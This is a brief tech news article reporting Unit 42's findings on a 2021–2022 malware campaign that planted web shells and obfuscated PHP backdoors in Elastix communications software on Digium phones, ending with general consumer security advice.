Cybersecurity analysts discovered more than 500,000 unique malware samples infiltrating Elastix communication software used by landline company Digium — not even corded phones are safe.
According to cybersecurity company Palo Alto’s threat intelligence team Unit 42, hackers targeted Digium phones by implanting a web shell (enabling a web server to be remotely accessed) for data exfiltration purposes. The attack spanned three months, from late December 2021 to the end of March 2022.
Landline phones are unexpected devices to be used as a way to infiltrate systems by threat actors, but as cybersecurity news outlet Cybernews points out, modern handsets are often connected to the internet of things, displaying contact information, storing voicemails and call logs, and more. Call centers and companies that use communication software via handsets are at risk.
The threat actors targeted the Elastix software Digium phones use, which is the largest open source software solution for unified communications server software. It brings together email, IM, faxing, collaboration functionality, and Internet Protocol (IP) Private Branch Exchange (PBX). As the report points out, it has a web interface and includes capabilities such as call center software with predictive dialing.
“The malware installs multilayer obfuscated PHP backdoors to the web server’s file system, downloads new payloads for execution and schedules recurring tasks to re-infect the host system,” the report states. “Moreover, the malware implants a random junk string to each malware download in an attempt to evade signature defenses based on indicators of compromise (IoCs).”
While Unit 42 doesn’t state if businesses or users were affected by the malware attack, it’s worth noting that malware attacks can spread to a selection of devices — not only through malware-infested Android apps or spyware on iPhones. To keep your phones and laptops safe, be sure to check out the best antivirus apps. And, for a better look at the different types of malicious attacks, find out the differences between spyware and stalkerware.